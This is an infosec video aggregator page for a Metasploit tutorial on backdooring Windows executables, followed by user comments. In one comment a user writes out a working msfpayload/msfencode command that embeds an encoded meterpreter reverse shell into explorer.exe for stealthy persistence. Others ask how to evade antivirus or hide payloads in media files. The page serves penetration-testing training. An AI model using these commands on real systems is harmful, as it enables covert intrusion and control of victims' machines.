Description:
This is Part 14 of the Metasploit Megaprimer series.
Please begin this series by starting by watching Part 1 of the Metasploit Megaprimer series, if you have not already done so.In this video, we will learn how to backdoor EXE files. We will first look at how to use Msfpayload and create EXEs for arbitrary payloads. Then we will learn about the need for encoding and how to encode payloads using variety of encoders using Msfencode. We will also look at how to take an existing executable like notepad.exe and backdoor it with our payload.
Would request you all to leave your feedback in the comments section below the video!
In the next video, we will look at the Pass-the-Hash Attack!!
Please watch this video in FULL SCREEN mode.
Tags: tools ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Comments:
These tutorials are fantastic, I appreciate how you face the problems and errors that show up during your demos and make sure that what you wanted to happen does happen no matter what.
Do you think metasploit could take advantage of alternative streams to place the backdoor in a template, keep its properties, and remain hidden?
Another excellent job.
I used this exploit on a few windows os, windows 7 with patch and windows xp. works perfect with anti-virus disabled and if i allow bind_tcp_encoded through zonealarm.
What i need to find out is;
If there's a way not to trigger an alarm by AV.
Hey Vivek,
Love the vids man, keep up the great work! We used your buffer overflow set of primer videos extensively during a university project on buffer overflows. Really helped us out there :)
After looking over the section on persistence and metsvc, I wasn't really happy with these as backdoor solutions from a counter-forensics point of view. Creating additional files in the filesystem just isn't stealth enough for me! ;)
This video in particular got me thinking of backdoors from a different point of view. My plan is to use the final technique in this video to encode a meterpreter reverse shell into the regularly used explorer.exe. The theory being that when the atacker has control of the system, they replace C:\WINDOWS\explorer.exe with the malicious executeable, maintaining the functionality of explorer.exe but with an added shiny new reverse meterpreter shell...
Well, I did some playing about and successfully created the new executeable with the following command:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.2 R | msfencode -e x86/shikata_ga_nai -t exe -x explorer.exe -o ~/explorer.exe -k
This was a good start and I was able to get a meterpreter session providing the listener was running on the attacker side.
The problem I encountered was as follows: If a listener is present on the hacker machine, a remote meterpreter shell is achieved and explorer behaves as normal. However if a listener is not present, explorer immediately crashes and restarts. This happens repeatedly every 2-3 seconds! Obviously from a stealth perspective this completely failed! haha! Any ideas what is happening here buddy? Is there any way to avoid this or should I forget about explorer.exe and pick a less critical exe? My main thought was that explorer.exe is always run, and is thus a reliable backdoor...
Thanks mate, hope all is well,
Dan
Great video as always. Keep it up.
Another great megaprimer! Thanks for sharing all of this! o/
Thanks for the effort Vivek !!
Qn: My wishlist is for msfencoder to encode the payload in other format such as *.avi and *.mp3. The payload should be embedded in such a way that the *.avi still get executed along with the payload.
No alarms there !! Is it possible Vivek ??
Thanks for all the comments guys! We have launched a SecurityTube Metasploit Framework Expert Certification today:
http://www.securitytube.net/smfe
The first 25 signups will receive discounted seats! Please hurry :)
Para conhecer o metasploit mais a fundo visite o fórum Amantes do Metasploit
http://www.amantesdometasploit.com.br
Para conhecer o metasploit mais a fundo visite o fórum Amantes do Metasploit, lá você vai encontrar muito material em português
http://www.amantesdometasploit.com.br
Hi Vivek, I'm loving all the video. I love this one too going from the port scanning to exploitation was a bit quick, it's not just you all the tutorials I've seen or read go something like; "ok we scan the host and see port n open so we deploy xyz exploit". How do you find out which exploit to use, is it just experience, surly even you can't know every exploit ever written.
It's a tiny thing love the videos, the quality is way higher that most I have seen. Thanks.